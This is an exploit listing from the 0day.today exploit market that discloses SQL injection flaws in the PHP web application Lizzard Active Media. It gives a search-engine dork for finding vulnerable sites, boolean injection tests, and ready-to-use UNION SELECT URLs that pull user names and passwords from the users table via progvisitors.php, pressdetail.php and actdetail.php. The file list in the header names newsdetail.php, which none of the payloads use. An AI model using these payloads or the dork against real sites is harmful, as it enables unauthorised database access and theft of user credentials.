[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Lizzard Active Media Multiple SQL Injection Vulnerabilities

Author
CoBRa_21
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12392
Category
web applications
Date add
25-05-2010
Platform
php
===========================================================
Lizzard Active Media Multiple SQL Injection Vulnerabilities
===========================================================


Lizzard Active Media Multiple SQL Injection Vulnerabilities:
newsdetail.php
progvisitors.php
actdetail.php
  
-------------------------------------------------------------------------------------------
  
Author: CoBRa_21
  
Script Home: http://www.lizzard.gr/
 
Dork: powered by Lizzard Active Media
 
-------------------------------------------------------------------------------------------
  
Sql Injection:
  
http://localhost/[path]/progvisitors.php?ptype=1/**/and/**/1=2
 
http://localhost/[path]/progvisitors.php?ptype=1/**/and/**/1=1
 
http://localhost/[path]/pressdetail.php?lang=&prs_id=61/**/union/**/select/**/0,1,2,group_concat(name,0x3a,password),4,5,6,7/**/from/**/users
 
http://localhost/[path]/actdetail.php?prg_id=-21/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(name,0x3a,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/**/from/**/users



#  0day.today [2024-07-03]  #